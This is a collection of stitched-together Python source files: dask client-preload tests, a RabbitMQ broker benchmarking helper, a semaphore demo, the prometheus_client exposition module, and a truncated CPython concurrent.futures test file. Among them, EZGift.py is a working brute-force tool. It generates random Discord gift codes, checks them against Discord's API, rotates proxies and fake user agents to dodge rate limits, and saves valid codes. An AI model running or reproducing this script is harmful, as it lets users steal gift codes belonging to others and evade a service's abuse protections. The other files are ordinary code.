def dask_teardown(client):
client.foo = "teardown"
"""
)
with dask.config.set({"distributed.client.preload": [text]}):
async with Client(address=s.address, asynchronous=True) as c:
assert c.foo == "setup"
assert c.foo == "teardown"
# This test is blocked on https://github.com/dask/distributed/issues/5819
@pytest.mark.xfail(
reason="The preload argument to the client isn't supported yet", strict=True
)
@gen_cluster(nthreads=[])
async def test_client_preload_click(s):
text = dedent(
"""\
import click
@click.command()
@click.argument("value")
def dask_setup(client, value):
client.foo = value
"""
)
value = "setup"
async with Client(
address=s.address, asynchronous=True, preload=text, preload_argv=[[value]]
) as c:
assert c.foo == value
@gen_cluster(nthreads=[])
async def test_client_preload_config_click(s):
text = dedent(
"""\
import click
@click.command()
@click.argument("value")
def dask_setup(client, value):
client.foo = value
"""
)
value = "setup"
with dask.config.set(
{
"distributed.client.preload": [text],
"distributed.client.preload-argv": [[value]],
}
):
async with Client(address=s.address, asynchronous=True) as c:
assert c.foo == value
|
BrokerActions.py | import sys
import io
import subprocess
import threading
import time
import uuid
import os.path
import requests
import json
from random import randint
from UniqueConfiguration import UniqueConfiguration
from CommonConfiguration import CommonConfiguration
from printer import console_out
class BrokerActions:
def __init__(self, deployer):
self._action_status = dict()
self._deployer = deployer
self.actor = "BROKER_ACTIONS"
def wait_for_msg_trigger(self, configurations, common_conf, trigger_at):
# iterate over configurations
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
# iterate over configurations
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
console_out(self.actor, f"Checking message total on node {unique_conf.node_number}")
broker_ip = self.get_broker_ip(unique_conf.technology, unique_conf.node_number, common_conf.run_tag, common_conf.key_pair)
msg_total = 0
while(msg_total < trigger_at):
msg_total = self.get_cluster_message_total(broker_ip, common_conf.username, common_conf.password)
console_out(self.actor, f"Trigger at {trigger_at}. Currently {msg_total} messages on node {unique_conf.node_number}")
time.sleep(10)
console_out(self.actor, f"Reached msg trigger on node {unique_conf.node_number}")
def restart_all_brokers(self, configurations, common_conf):
r_threads = list()
for config_tag in configurations:
console_out(self.actor, f"BROKER RESTART FOR configuration {config_tag}")
unique_conf_list = configurations[config_tag]
# iterate over configurations
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
# iterate over nodes of this configuration
for n in range(unique_conf.cluster_size):
node = int(unique_conf.node_number) + n
restart = threading.Thread(target=self.restart_broker, args=(unique_conf.technology, str(node), common_conf.run_tag, common_conf.key_pair,))
r_threads.append(restart)
for rt in r_threads:
rt.start()
for rt in r_threads:
rt.join()
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
for n in range(unique_conf.cluster_size):
node = int(unique_conf.node_number) + n
status_id = f"{unique_conf.technology}{node}"
if self._action_status[status_id] != "success":
console_out(self.actor, f"Broker restart failed for node {unique_conf.technology}{node}")
if not common_conf.no_deploy:
self._deployer.teardown_all(configurations, common_conf.run_tag, False)
def restart_one_broker(self, configurations, common_conf):
r_threads = list()
for config_tag in configurations:
console_out(self.actor, f"BROKER RESTART FOR configuration {config_tag}")
unique_conf_list = configurations[config_tag]
# iterate over configurations
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
restart = threading.Thread(target=self.restart_broker, args=(unique_conf.technology, str(unique_conf.node_number), common_conf.run_tag, common_conf.key_pair,))
r_threads.append(restart)
for rt in r_threads:
rt.start()
for rt in r_threads:
rt.join()
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
status_id = f"{unique_conf.technology}{unique_conf.node_number}"
if self._action_status[status_id] != "success":
console_out(self.actor, f"Broker restart failed for node {unique_conf.technology}{unique_conf.node_number}")
if not common_conf.no_deploy:
self._deployer.teardown_all(configurations, common_conf.run_tag, False)
def restart_broker(self, technology, node, run_tag, key_pair):
status_id = technology + node
exit_code = subprocess.call(["bash", "restart-broker.sh",
key_pair,
node,
run_tag,
technology])
if exit_code != 0:
console_out(self.actor, f"Restart of broker on node {node} failed with exit code {exit_code}")
self._action_status[status_id] = "failed"
else:
self._action_status[status_id] = "success"
def get_broker_ip(self, technology, node, run_tag, key_pair):
broker_ip = ""
attempts = 0
while broker_ip == "" and attempts < 3:
attempts += 1
process = subprocess.Popen(["bash", "get_broker_ip.sh",
key_pair,
node,
run_tag,
technology], stdout=subprocess.PIPE)
for line in io.TextIOWrapper(process.stdout, encoding="utf-8"):
if not line:
break
if line.startswith("BROKER_IP="):
broker_ip = line.rstrip().replace("BROKER_IP=","")
break
if broker_ip == "":
time.sleep(5)
return broker_ip
def get_cluster_message_total(self, broker_ip, username, password):
res = requests.get(f"http://{broker_ip}:15672/api/overview",
auth=(username,password))
overview_json = res.json()
queue_totals = overview_json["queue_totals"]
if "messages" in queue_totals:
return queue_totals["messages"]
else:
return 0 |
test.py | from threading import Thread, Semaphore
from time import sleep
aArrived = Semaphore(0)
bArrived = Semaphore(0)
def aBody():
aArrived.release()
print('a at rendezvous')
bArrived.acquire()
print('a past rendezvous')
def bBody():
bArrived.release()
print('b at rendezvous')
aArrived.acquire()
print('b past rendezvous')
tA = Thread(target=aBody)
tA.start()
sleep(1) # force thread A to block
tB = Thread(target=bBody)
tB.start() |
exposition.py | #!/usr/bin/python
from __future__ import unicode_literals
import base64
import os
import socket
import sys
import threading
from contextlib import closing
from wsgiref.simple_server import WSGIRequestHandler, make_server
from prometheus_client import core
from prometheus_client.openmetrics import exposition as openmetrics
try:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
from urllib2 import build_opener, Request, HTTPHandler
from urllib import quote_plus
from urlparse import parse_qs, urlparse
except ImportError:
# Python 3
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.request import build_opener, Request, HTTPHandler
from urllib.parse import quote_plus, parse_qs, urlparse
CONTENT_TYPE_LATEST = str('text/plain; version=0.0.4; charset=utf-8')
'''Content type of the latest text format'''
PYTHON26_OR_OLDER = sys.version_info < (2, 7)
def make_wsgi_app(registry=core.REGISTRY):
'''Create a WSGI app which serves the metrics from a registry.'''
def prometheus_app(environ, start_response):
params = parse_qs(environ.get('QUERY_STRING', ''))
r = registry
encoder, content_type = choose_encoder(environ.get('HTTP_ACCEPT'))
if 'name[]' in params:
r = r.restricted_registry(params['name[]'])
output = encoder(r)
status = str('200 OK')
headers = [(str('Content-type'), content_type)]
start_response(status, headers)
return [output]
return prometheus_app
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
def start_wsgi_server(port, addr='', registry=core.REGISTRY):
"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
def generate_latest(registry=core.REGISTRY):
'''Returns the metrics from the registry in latest text format as a string.'''
def sample_line(s):
if s.labels:
labelstr = '{{{0}}}'.format(','.join(
['{0}="{1}"'.format(
k, v.replace('\\', r'\\').replace('\n', r'\n').replace('"', r'\"'))
for k, v in sorted(s.labels.items())]))
else:
labelstr = ''
timestamp = ''
if s.timestamp is not None:
# Convert to milliseconds.
timestamp = ' {0:d}'.format(int(float(s.timestamp) * 1000))
return '{0}{1} {2}{3}\n'.format(
s.name, labelstr, core._floatToGoString(s.value), timestamp)
output = []
for metric in registry.collect():
mname = metric.name
mtype = metric.type
# Munging from OpenMetrics into Prometheus format.
if mtype == 'counter':
mname = mname + '_total'
elif mtype == 'info':
mname = mname + '_info'
mtype = 'gauge'
elif mtype == 'stateset':
mtype = 'gauge'
elif mtype == 'gaugehistogram':
# A gauge histogram is really a gauge,
# but this captures the strucutre better.
mtype = 'histogram'
elif mtype == 'unknown':
mtype = 'untyped'
output.append('# HELP {0} {1}\n'.format(
mname, metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append('# TYPE {0} {1}\n'.format(mname, mtype))
om_samples = {}
for s in metric.samples:
for suffix in ['_created', '_gsum', '_gcount']:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
om_samples.setdefault(suffix, []).append(sample_line(s))
break
else:
output.append(sample_line(s))
for suffix, lines in sorted(om_samples.items()):
output.append('# TYPE {0}{1} gauge\n'.format(metric.name, suffix))
output.extend(lines)
return ''.join(output).encode('utf-8')
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return (generate_latest, CONTENT_TYPE_LATEST)
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``core.REGISTRY``."""
registry = core.REGISTRY
def do_GET(self):
registry = self.registry
params = parse_qs(urlparse(self.path).query)
encoder, content_type = choose_encoder(self.headers.get('Accept'))
if 'name[]' in params:
registry = registry.restricted_registry(params['name[]'])
try:
output = encoder(registry)
except:
self.send_error(500, 'error generating metric output')
raise
self.send_response(200)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@staticmethod
def factory(registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to core.REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str('MetricsHandler')
MyMetricsHandler = type(cls_name, (MetricsHandler, object),
{"registry": registry})
return MyMetricsHandler
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
"""Thread per request HTTP server."""
def start_http_server(port, addr='', registry=core.REGISTRY):
"""Starts an HTTP server for prometheus metrics as a daemon thread"""
CustomMetricsHandler = MetricsHandler.factory(registry)
httpd = _ThreadingSimpleServer((addr, port), CustomMetricsHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
def write_to_textfile(path, registry):
'''Write metrics to the given path.
This is intended for use with the Node exporter textfile collector.
The path must end in .prom for the textfile collector to process it.'''
tmppath = '%s.%s.%s' % (path, os.getpid(), threading.current_thread().ident)
with open(tmppath, 'wb') as f:
f.write(generate_latest(registry))
# rename(2) is atomic.
os.rename(tmppath, path)
def default_handler(url, method, timeout, headers, data):
'''Default handler that implements HTTP/HTTPS connections.
Used by the push_to_gateway functions. Can be re-used by other handlers.'''
def handle():
request = Request(url, data=data)
request.get_method = lambda: method
for k, v in headers:
request.add_header(k, v)
resp = build_opener(HTTPHandler).open(request, timeout=timeout)
if resp.code >= 400:
raise IOError("error talking to pushgateway: {0} {1}".format(
resp.code, resp.msg))
return handle
def basic_auth_handler(url, method, timeout, headers, data, username=None, password=None):
'''Handler that implements HTTP/HTTPS connections with Basic Auth.
Sets auth headers using supplied 'username' and 'password', if set.
Used by the push_to_gateway functions. Can be re-used by other handlers.'''
def handle():
'''Handler that implements HTTP Basic Auth.
'''
if username is not None and password is not None:
auth_value = '{0}:{1}'.format(username, password).encode('utf-8')
auth_token = base64.b64encode(auth_value)
auth_header = b'Basic ' + auth_token
headers.append(['Authorization', auth_header])
default_handler(url, method, timeout, headers, data)()
return handle
def push_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
'''Push metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
If not None, the argument must be a function which accepts
the following arguments:
url, method, timeout, headers, and content
May be used to implement additional functionality not
supported by the built-in default handler (such as SSL
client certicates, and HTTP authentication mechanisms).
'url' is the URL for the request, the 'gateway' argument
described earlier will form the basis of this URL.
'method' is the HTTP method which should be used when
carrying out the request.
'timeout' requests not successfully completed after this
many seconds should be aborted. If timeout is None, then
the handler should not set a timeout.
'headers' is a list of ("header-name","header-value") tuples
which must be passed to the pushgateway in the form of HTTP
request headers.
The function should raise an exception (e.g. IOError) on
failure.
'content' is the data which should be used to form the HTTP
Message Body.
This overwrites all metrics with the same job and grouping_key.
This uses the PUT HTTP method.'''
_use_gateway('PUT', gateway, job, registry, grouping_key, timeout, handler)
def pushadd_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
'''PushAdd metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This replaces metrics with the same name, job and grouping_key.
This uses the POST HTTP method.'''
_use_gateway('POST', gateway, job, registry, grouping_key, timeout, handler)
def delete_from_gateway(
gateway, job, grouping_key=None, timeout=30, handler=default_handler):
'''Delete metrics from the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long delete will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This deletes metrics with the given job and grouping_key.
This uses the DELETE HTTP method.'''
_use_gateway('DELETE', gateway, job, None, grouping_key, timeout, handler)
def _use_gateway(method, gateway, job, registry, grouping_key, timeout, handler):
gateway_url = urlparse(gateway)
if not gateway_url.scheme or (PYTHON26_OR_OLDER and gateway_url.scheme not in ['http', 'https']):
gateway = 'http://{0}'.format(gateway)
url = '{0}/metrics/job/{1}'.format(gateway, quote_plus(job))
data = b''
if method != 'DELETE':
data = generate_latest(registry)
if grouping_key is None:
grouping_key = {}
url += ''.join(
'/{0}/{1}'.format(quote_plus(str(k)), quote_plus(str(v)))
for k, v in sorted(grouping_key.items()))
handler(
url=url, method=method, timeout=timeout,
headers=[('Content-Type', CONTENT_TYPE_LATEST)], data=data,
)()
def instance_ip_grouping_key():
'''Grouping key with instance set to the IP Address of this host.'''
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
s.connect(('localhost', 0))
return {'instance': s.getsockname()[0]}
|
EZGift.py | from requests.exceptions import ProxyError, SSLError, ConnectionError, InvalidProxyURL, ChunkedEncodingError
import multiprocessing
from colorama import Fore, Style
from threading import Thread
import fake_useragent
import platform
import requests
import random
import string
import json
import time
import re
import os
from datetime import date
import webbrowser
import sys
cpm = 0
total = 0
valid = 0
invalid = 0
today = date.today()
proxies = "proxy.txt"
timeout = 3
config = False
runmain = 0
def cpmrunner():
global valid
global invalid
global cpm
while True:
oldchecked = valid + invalid
time.sleep(3)
newchecked = invalid + valid
cpm = (newchecked - oldchecked) * 60
if not os.path.isfile("proxy.txt"):
with open("proxy.txt", "w") as fp:
pass
if not os.path.exists("Results"):
os.makedirs("Results")
def clear():
os.system("cls" if os.name == "nt" else "echo -e \\\\033c")
os.system("mode con: cols=105 lines=30")
def clear2():
os.system("cls" if os.name == "nt" else "echo -e \\\\033c")
logo()
print(" ")
print(" ")
print("{} ╔══════════════════════════════════════════════════════════════════╗{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
print(" ")
def logo():
try:
print(Fore.LIGHTBLUE_EX)
msg = f"""
███████╗███████╗ ██████╗ ██╗███████╗████████╗
██╔════╝╚══███╔╝██╔════╝ ██║██╔════╝╚══██╔══╝
█████╗ ███╔╝ ██║ ███╗██║█████╗ ██║
██╔══╝ ███╔╝ ██║ ██║██║██╔══╝ ██║
███████╗███████╗╚██████╔╝██║██║ ██║
╚══════╝╚══════╝ ╚═════╝ ╚═╝╚═╝ ╚═╝\n
"""
for l in msg:
print(l, end="")
print(Fore.RESET + "\t\t\t Follow Me on Youtube: Dr. Teilaw")
except KeyboardInterrupt:
sys.exit()
path, _ = os.path.split(__file__)
ua = fake_useragent.UserAgent()
proxy_file = open("proxy.txt", "r")
proxy_text = proxy_file.readlines()
not_checked = []
def headers():
header = {
"User-Agent" : ua.random,
"content-type":"application/json",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Connection": "keep-alive",
}
return header
def process():
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.RESET)
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + " [+]" + Fore.LIGHTGREEN_EX + " Process Running Successfully... \n" + Fore.RESET)
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.RESET)
print(Fore.LIGHTMAGENTA_EX + " ╚════════════════" + Fore.LIGHTYELLOW_EX + " GiftCode " + Fore.LIGHTMAGENTA_EX + "══════" + Fore.LIGHTBLUE_EX + " Results " + Fore.LIGHTMAGENTA_EX + "════════"+ Fore.LIGHTYELLOW_EX + " Proxies " + Fore.LIGHTMAGENTA_EX + "════════╝" + Fore.RESET)
print(" ")
def proxies():
line = random.choice(proxy_text)
ip = line.replace("\n", "")
if str(ip).startswith("http"):
pass
else:
https = "https://"+ip
http = "http://"+ip
proxy = {
"https":https,
"http":http
}
return proxy
def code():
if option == 2:
try:
line = random.choice(codes)
code = line.replace("\n", "")
codes.remove(line)
except IndexError:
code = ("").join(random.choices(string.ascii_letters + string.digits, k=16))
else:
code = ("").join(random.choices(string.ascii_letters + string.digits, k=16))
return code
def debug(code, text, proxy, show):
global cpm
global total
global invalid
global valid
global config
try:
line = Fore.LIGHTYELLOW_EX + proxy["http"].split("//")[1]
host = str(line.split(":")[0])
port = str(line.split(":")[1])
except:
return
if show.lower() == "error" or show.lower() == "message":
not_checked.append(code)
if config == False:
return
text = Fore.LIGHTYELLOW_EX + text + Fore.RESET
if "Invalid" in text:
text = Fore.RED + " " + text
total = total + 1
invalid = invalid +1
with open("Results/Bad.txt", "a+") as (f):
f.writelines(code + " | BAD | " + str(today) + "\n")
elif "Valided" in text:
text = Fore.GREEN + " " + text
total = total + 1
valid = valid + 1
with open("Results/Hits.txt", "a+") as (f):
f.writelines(code + " | HIT | " + str(today) + "\n")
line = Fore.LIGHTYELLOW_EX + proxy["http"].split("//")[1] + Fore.RESET
code = Fore.LIGHTYELLOW_EX + code + Fore.RESET
logo = str(Fore.LIGHTMAGENTA_EX + "> [Checker] - " + Fore.RESET)
os.system("title " + " Discord Gift Checker by Teilaw - Checking [{}] - Hits: {} - Bad: {} - CPM [{}]".format(total, valid, invalid, cpm))
print("{0:16} {1:26} {2:18} {3:22}".format(logo, code, text, line))
def run_checker(code, headers, proxy):
try:
global running
running += 1
except:
running = 0
s = requests.session()
s.proxies = proxy
url = "https://discordapp.com/api/v6/entitlements/gift-codes/{}?with_application=false&with_subscription_plan=true".format(code)
try:
rr = s.get(url, headers=headers, timeout=timeout)
if "subscription_plan".lower() in (rr.text).lower():
save(code)
debug(code, "Valid", proxy, "Valid")
running -= 1
sys.exit()
o = json.loads(rr.text)
message = o["message"].lower()
if message == "Unknown Gift Code".lower():
debug(code, "Invalid", proxy, "Invalid")
elif message == "You are being rate limited.".lower():
debug(code, "Message", proxy, "Message")
elif message == "Access denied":
debug(code, "Message", proxy, "Message")
else:
print(rr.text)
except KeyboardInterrupt:
sys.exit()
except ProxyError:
debug(code," " + "ProxyEr", proxy, "Error")
except SSLError:
debug(code," " + "SSLErro", proxy, "Error")
except ConnectionError:
debug(code," " + "Connect", proxy, "Error")
except InvalidProxyURL:
debug(code," " + "ProxURL", proxy, "Error")
except requests.exceptions.ReadTimeout:
debug(code," " + "Timeout", proxy, "Error")
except UnicodeError:
debug(code," " + "UnError", proxy, "Error")
except ChunkedEncodingError:
debug(code," " + "Encodin", proxy, "Error")
except json.decoder.JSONDecodeError:
debug(code," " + "JDecode", proxy, "Decode")
running -= 1
sys.exit()
if __name__ == "__main__":
try:
clear()
os.system("title " + " Discord Gift Checker by Teilaw ~ Waiting [0/0] - Hits: 0 - Bad: 0")
logo()
print(" ")
print(" ")
print("{} ╔════ Settings ════════════════════════════════╗{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
print("{} ║{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + " 1 - " + Fore.RESET + "[AUTO] Generator + Checker")
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + " 2 - " + Fore.RESET + "Exit")
print("{} ║{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
print("{} ╚══════════════════════════════════════════════╝{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
try:
option = int(input("\n" + Fore.LIGHTBLUE_EX + " [?] - " + Fore.RESET + "Select Option (" + Fore.LIGHTBLUE_EX + "1" + Fore.RESET + " or " + Fore.LIGHTBLUE_EX + "2" + Fore.RESET + "): "))
except:
print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Invalid option.." + Fore.RESET)
sys.exit()
if option == 2:
print(" ")
print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Thanks, BYE!" + Fore.RESET)
time.sleep(2)
sys.exit()
print(" ")
threads = int(input("\n" + Fore.LIGHTBLUE_EX + " [?] - " + Fore.RESET + "How many Threads ?: " + Fore.RESET))
print(" ")
print(Fore.LIGHTBLUE_EX + " >"+ Fore.LIGHTGREEN_EX + " Starting.. Please Wait" + Fore.RESET)
time.sleep(2)
clear2()
mythreads = []
pr = multiprocessing.Process(target=process)
pr.start()
running = 0
while True:
if running <= threads:
Thread(target=cpmrunner).start()
x = Thread(target=run_checker, args=(code(), headers(), proxies(),))
mythreads.append(x)
x.start()
else:
time.sleep(1)
for unchecked_code in not_checked:
x = Thread(target=run_checker, args=(code(), headers(), proxies(),))
mythreads.append(x)
x.start()
not_checked.remove(unchecked_code)
except KeyboardInterrupt:
print(" ")
print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Thanks, BYE!" + Fore.RESET)
time.sleep(2)
sys.exit()
except FileNotFoundError:
print(" ")
print(Fore.LIGHTBLUE_EX + " [!] - " + Fore.LIGHTRED_EX + "Invalid File Path" + Fore.RESET)
sys.exit() |
test_concurrent_futures.py | from test import support
from test.support import import_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
import_helper.import_module('_multiprocessing')
from test.support import hashlib_helper
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool, _check_system_limits
import multiprocessing.process
import multiprocessing.util
import multiprocessing as mp
if support.check_sanitizer(address=True, memory=True):
# bpo-46633: Skip the test because it is too slow when Python is built
# with ASAN/MSAN: between 5 and 20 minutes on GitHub Actions.
raise unittest.SkipTest("test too slow on ASAN/MSAN build")
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, mgr):
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = threading_helper.threading_setup()
def tearDown(self):
support.reap_children()
threading_helper.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return mp.get_context(self.ctx)
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
try:
_check_system_limits()
except NotImplementedError:
self.skipTest("ProcessPoolExecutor unavailable on this system")
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
def get_context(self):
try:
_check_system_limits()
except NotImplementedError:
self.skipTest("ProcessPoolExecutor unavailable on this system")
return super().get_context()
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
try:
_check_system_limits()
except NotImplementedError:
self.skipTest("ProcessPoolExecutor unavailable on this system")
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
for _ in support.sleeping_retry(support.SHORT_TIMEOUT,
"executor not broken"):
if self.executor._broken:
break
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
